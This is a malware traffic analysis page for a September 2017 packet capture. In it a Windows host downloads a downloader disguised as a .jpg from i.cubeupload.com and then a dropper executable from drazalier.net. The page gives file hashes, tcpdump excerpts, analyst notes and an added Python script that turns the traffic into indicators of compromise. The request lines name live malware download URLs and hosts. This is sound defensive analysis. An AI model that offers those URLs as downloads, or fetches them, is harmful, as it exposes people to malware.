Malware Trojan Downloader Dropper cubeupload.com PCAP file download traffic analysis

Download Attachments

  • 1 pcap icube (PCAP, 31 KB, added September 25, 2017)

FILE 1 – Downloader

43 engines detected this file
SHA-256 b069e7d29889bcdcc61e7936ad4800d2563c8618135f40c50e4dbcdc9314f505
File name gfD4vo.jpg
File size 522.61 KB
Last analysis 2017-09-25 22:14:16 UTC

FILE 2 – Dropper

23 engines detected this file
SHA-256 214325a508b6354286f0ba47afdf998ea8c5b87012d6fac08ec0e7a996ac1999
File name 2602033098198832.exe
File size 266.49 KB
Last analysis 2017-09-25 22:34:21 UTC
Community score -11

2017-09-25 16:39:29.774994 IP 192.168.1.102.61160 > 75.75.75.75.53: 16676+ A? i.cubeupload.com. (34)
2017-09-25 16:39:29.812702 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [S], seq 1274466961, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-09-25 16:39:29.934339 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [.], ack 217614345, win 256, length 0
2017-09-25 16:39:30.010343 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [P.], seq 0:489, ack 1, win 256, length 489: HTTP: GET /gfD4vo.jpg HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: i.cubeupload.com
Connection: Keep-Alive

Analyst note: the first action in the capture is a lookup of i.cubeupload.com followed by a plain-HTTP GET for /gfD4vo.jpg. The extension says image, but what comes back is the 522.61 KB gfD4vo.jpg listed above with 43 detections. The request uses an MSIE 8.0 / Windows NT 6.1 User-Agent with an IE-style Accept list and carries no Referer, so it is a direct fetch by the downloader rather than a link followed from a page.

2017-09-25 16:39:30.748418 IP 192.168.1.102.56858 > 192.35.177.64.80: Flags [P.], seq 0:139, ack 1, win 256, length 139: HTTP: GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

2017-09-25 16:39:30.893843 IP 192.168.1.102.56858 > 192.35.177.64.80: Flags [.], ack 1219, win 251, length 0
2017-09-25 16:39:30.924425 IP 192.168.1.102.61163 > 75.75.75.75.53: 19539+ A? isrg.trustid.ocsp.identrust.com. (49)
2017-09-25 16:39:30.942900 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [S], seq 1854319918, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-09-25 16:39:31.041398 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [.], ack 2211464567, win 256, length 0
2017-09-25 16:39:31.042271 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [P.], seq 0:247, ack 1, win 256, length 247: HTTP: GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: isrg.trustid.ocsp.identrust.com

2017-09-25 16:39:31.187180 IP 192.168.1.102.61164 > 75.75.75.75.53: 10447+ A? ocsp.int-x3.letsencrypt.org. (45)
2017-09-25 16:39:31.277686 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [P.], seq 295:812, ack 3052, win 256, length 517
[517 bytes of encrypted TLS application data, not reproduced]
2017-09-25 16:39:31.393111 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 5972, win 256, length 0
2017-09-25 16:39:31.394922 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 8892, win 256, length 0
2017-09-25 16:39:31.395511 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 11812, win 256, length 0
2017-09-25 16:39:31.396583 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 14732, win 256, length 0
2017-09-25 16:39:31.397200 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 17652, win 256, length 0
2017-09-25 16:39:31.508500 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 20572, win 256, length 0
2017-09-25 16:39:31.509234 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 23492, win 256, length 0

Analyst note: the requests with User-Agent Microsoft-CryptoAPI/6.1 are not the malware talking; they are Windows building and checking a certificate chain. The .p7c fetched from apps.identrust.com is the DST Root CA X3 certificate, the GET to isrg.trustid.ocsp.identrust.com is an OCSP request (the base64 blob in the path is the DER-encoded request), and the lookup of ocsp.int-x3.letsencrypt.org points at a Let's Encrypt issued certificate being validated. The trigger is the TLS session on client port 56857 to 46.4.115.108:443, the same address the i.cubeupload.com request went to; of that session only encrypted data and the client's ACKs (about 23 KB received from the server by 16:39:31.5) are visible in this excerpt. Filter this PKI noise out before counting C2 hosts, but keep the timestamps: they show when the TLS session was active.

2017-09-25 16:39:48.032574 IP 192.168.1.102.61165 > 75.75.75.75.53: 52627+ A? drazalier.net. (31)
2017-09-25 16:39:48.181862 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [S], seq 436295889, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-09-25 16:39:48.293504 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [.], ack 3080210756, win 256, length 0
2017-09-25 16:39:48.300187 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [P.], seq 0:499, ack 1, win 256, length 499: HTTP: GET /PO/2602033098198832.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: drazalier.net
Connection: Keep-Alive

Analyst note: about 17 seconds later (16:39:48) the host resolves drazalier.net and downloads /PO/2602033098198832.exe from 62.210.101.38 over plain HTTP, with the same User-Agent and Accept header as the first request. That file is the dropper (FILE 2 above, 266.49 KB, 23 detections). For blocking and hunting, drazalier.net, 62.210.101.38 and the /PO/ path are the specific indicators; i.cubeupload.com is a public image host, so treat it as abused third-party infrastructure and block the full URL rather than the domain.
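The same triage as above, done mechanically. This is an added example, not code from the original post or from any tool it uses: it parses tcpdump -A style text into DNS queries and HTTP requests, skips the unreadable raw-byte lines, and labels each request the way a responder would want to separate them (PKI background traffic, plaintext executable downloads, direct fetches with no Referer, hosts never resolved in the capture). The SAMPLE string is constructed from the DNS and HTTP lines on this page; the label names and rules in triage() are this example's own assumptions. Requires Python 3.8 or newer.

```python
"""Added example (not code from the original post): parse tcpdump -A style
text like the capture excerpts above into an IOC list and triage each HTTP
request.  SAMPLE is constructed from the DNS and HTTP lines on this page;
the triage labels are this example's own assumptions, not the page's."""
import re
from dataclasses import dataclass, field

SAMPLE = """\
2017-09-25 16:39:29.774994 IP 192.168.1.102.61160 > 75.75.75.75.53: 16676+ A? i.cubeupload.com. (34)
2017-09-25 16:39:30.010343 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [P.], seq 0:489, ack 1, win 256, length 489: HTTP: GET /gfD4vo.jpg HTTP/1.1
E.....@...}....f..sl...PK...... P.......GET /gfD4vo.jpg HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Host: i.cubeupload.com
Connection: Keep-Alive

2017-09-25 16:39:30.748418 IP 192.168.1.102.56858 > 192.35.177.64.80: Flags [P.], seq 0:139, ack 1, win 256, length 139: HTTP: GET /roots/dstrootcax3.p7c HTTP/1.1
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

2017-09-25 16:39:48.032574 IP 192.168.1.102.61165 > 75.75.75.75.53: 52627+ A? drazalier.net. (31)
2017-09-25 16:39:48.300187 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [P.], seq 0:499, ack 1, win 256, length 499: HTTP: GET /PO/2602033098198832.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Host: drazalier.net
Connection: Keep-Alive
"""

# tcpdump packet summary: timestamp, src.port > dst.port: rest
PKT_RE = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\d \S+) IP [\d.]+\.\d+ > "
                    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): (?P<rest>.*)$")
DNS_RE = re.compile(r"\bA\? (?P<name>[\w.-]+)\. \(\d+\)")       # "12345+ A? name. (len)"
HTTP_RE = re.compile(r"HTTP: (?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]")
HDR_RE = re.compile(r"^([A-Za-z][\w-]*): (.*)$")                  # "Name: value"

@dataclass
class Request:
    ts: str
    dst: str
    dport: int
    path: str
    headers: dict = field(default_factory=dict)

    @property
    def host(self) -> str:
        return self.headers.get("host", self.dst)

    @property
    def url(self) -> str:
        return f"http://{self.host}{self.path}"

def parse(text):
    """Return (dns_queries, requests).  Header lines after an HTTP packet
    summary attach to it until a blank line; tcpdump's raw-byte lines
    (mostly dots) match neither pattern and are skipped."""
    dns, reqs, cur = [], [], None
    for line in text.splitlines():
        pkt = PKT_RE.match(line)
        if pkt:
            cur = None
            if d := DNS_RE.search(pkt["rest"]):
                dns.append((pkt["ts"], d["name"]))
            elif h := HTTP_RE.search(pkt["rest"]):
                cur = Request(pkt["ts"], pkt["dst"], int(pkt["dport"]), h["path"])
                reqs.append(cur)
        elif not line.strip():
            cur = None
        elif cur and (hdr := HDR_RE.match(line)):
            cur.headers[hdr[1].lower()] = hdr[2]
    return dns, reqs

EXEC_EXT = (".exe", ".dll", ".scr", ".msi", ".hta")

def triage(req, dns_names):
    """Assumed labels (this example's own, not the page's) for a responder."""
    ua = req.headers.get("user-agent", "")
    notes = []
    if ua.startswith("Microsoft-CryptoAPI"):
        notes.append("pki-background")                # Windows chain building / OCSP, not C2
    if req.path.lower().endswith(EXEC_EXT):
        notes.append("plaintext-executable-download")
    if "MSIE" in ua and "referer" not in req.headers:
        notes.append("direct-fetch-no-referer")       # program download, not a followed link
    if req.host not in dns_names:
        notes.append("host-not-resolved-in-capture")  # cached, hard-coded, or outside excerpt
    return notes

def iocs(text):
    """Collect indicators and per-URL triage notes from one capture excerpt."""
    dns, reqs = parse(text)
    names = {n for _, n in dns}
    return {
        "domains": sorted(names | {r.host for r in reqs}),
        "ips": sorted({r.dst for r in reqs}),
        "urls": [r.url for r in reqs],
        "triage": {r.url: triage(r, names) for r in reqs},
    }

if __name__ == "__main__":
    for key, value in iocs(SAMPLE).items():
        print(key, value)
```

Run it on `tcpdump -A -r icube.pcap` output (or any text in that shape) instead of SAMPLE and the identrust request comes out labelled pki-background while the drazalier.net fetch is the only plaintext executable download; the host-not-resolved label on apps.identrust.com just records that its DNS lookup is not in the excerpt.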